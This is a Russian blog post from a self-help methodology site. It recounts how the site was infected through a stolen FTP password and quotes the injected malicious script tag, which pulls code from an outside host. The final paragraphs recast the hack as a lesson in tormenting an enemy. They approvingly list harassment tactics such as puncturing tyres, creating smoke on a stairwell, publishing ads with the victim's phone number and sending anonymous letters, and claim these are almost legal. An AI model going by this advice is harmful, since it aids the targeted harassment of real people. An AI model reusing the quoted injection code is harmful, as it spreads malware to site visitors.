Бэкмология – искусство нахождения простоты. Это методология укрепления психики и контроллинга психической деятельности. Суть методологии состоит в корректировке мировоззрения и жизненных установок, гармонизации внутреннего мира человека, достижении открытости ума. В ее состав входят модели преодоления неопределенности, паттерны успешного поведения, сбалансированный инструментарий поддержки принятия и реализации решений.

Бэкмология включает более десяти пособий. К ним относится книга «Создание решений для деловых проблем», которое описывает строгий, детализированный и очень человечный процесс решения неструктурированных деловых проблем, пособие «Защита собственной психики» – полное руководство по приемам психологического воздействия (атака, давление, манипуляция, обман, блеф, зомбирование и др.) и техникам эффективной защиты от него. Также Бэкмология представлена методиками рациоконтроллинга и психоконтроллинга.


Те, у кого есть свой бизнес, могут начать знакомство с Бэкмологией с сессии «Улучшение продаж». Это честная профессиональная работа, ориентированная на результат.


вторник, 14 июля 2015 г.

Как лучше насолить своему врагу



Некоторое время назад наш сайт becmology.ru подвергся хакерской атаке. Все страницы получили вставку в виде кода типа:

<!--e8b49b--><script type="text/javascript" src="http://adonis-body.com/products_pictures/ymbpy42q.php?id=7614938"></script><!--/e8b49b-->

Это вредоносный вирус под названием Troj/JSRedir-NZ.

Из анализа логов (журналов) веб-сервера мы заметили, что взлом и заражение вирусом Troj/JSRedir-NZ происзошло через скомпрометированный FTP аккаунт.

Как происходит взлом и заражение сайта? Администратор сайта, вебмастер или привлеченный фрилансер не задумывается о том, что FTP-доступы могут быть легко перехвачены хакерами при работе в открытых сетях или при использовании незащищенного интернет-соединения (в кафе, метро, в парках, в гостиницах и пр.), что компьютер может быть заражен троянской программой, которая «слушает» подключение по 21 порту и перехватывает доступы, так как они передаются в открытом виде. Также есть вариант троянца, который вытаскивает логин/пароль непосредственно из настроек FTP-клиента, где их сохраняет администратор (ведь это удобно!) Далее перехваченные доступы FTP передаются на управляющий сервер, и уже с другого хоста выполняется подключение по FTP, выгрузка файлов, внедрение в них вирусного кода, а затем загрузка обратно на сайт. Операции могут выполняться ежедневно в различное время. В какие-то моменты времени вредоносный код удаляется из файлов, поэтому при анализе можно его не обнаружить. А на следующий день снова добавляться.

Можно сказать, ничего страшного не произошло. Мы почистили сайт, сменили пароль FTP-клиента – вся операция по времени заняла полдня. Правда, уведомление о вредоносности нашего сайта на поисковых сервисах типа Яндекс висело несколько дней. В течение этих дней серферы сети на наш сайт заходить боялись – опасались, что зараза перекинется на их клиентские устройства.

Если бы сайт являлся для нас критической точкой бизнеса, мы понесли бы немалые материальные и моральные потери. Но поскольку сайт для нас – лишь второстепенный информационный сервис, его взлом «обедню» нам почти не испортил. Было лишь потеряно несколько рабочих часов на восстановление резервной копии и смену пароля.

Какой урок из данной ситуации можно извлечь?

Если не брать в расчет соображения необходимости усиления безопасности, то, казалось бы, почти никакой. Но постойте!

Атака на малоприметные сайты рядовых граждан – явление вообще-то неординарное. Как правило, атакуют популярные сайты, влияющие на умы народных масс. Штатные администраторы этих сайтов к различным атакам во всеоружии готовы, и отражение любой атаки происходит оперативно и практически всегда успешно. Разве что сайт «зависает» на несколько часов. Для ординарных сайтов штатных администраторов не держат, постоянного мониторинга активности на сайте не производят. Взлом здесь рассматривается как событие неприятное, но маловероятное.

Однако всякая неприятная неожиданность действует на нервы. Чем больше таких неожиданностей, тем более дерганным, неуравновешенным становится человек, которого эти события непосредственно касаются.

Чтобы окончательно вывести человека из себя достаточно устроить ему серию маленьких неприятных неожиданностей. Чтобы жизнь любого индивида превратилась в настоящий ад, достаточно через день устраивать ему маленькие пакости: проколоть колесо, устроить задымление на лестничной площадке, случайно облить постным маслом в магазине, дать «горячее» объявление в газете с номером телефона жертвы, написать анонимку и т.д.

Атака не веб-сайт – это лишь одно из звеньев в длинной череде бытовых неприятностей, которые должны массированно обрушиться на выбранную жертву. Ни одна психика перед таким напором не устоит. И главное – почти никакой противозаконной деятельности!


Комментариев нет:

Отправить комментарий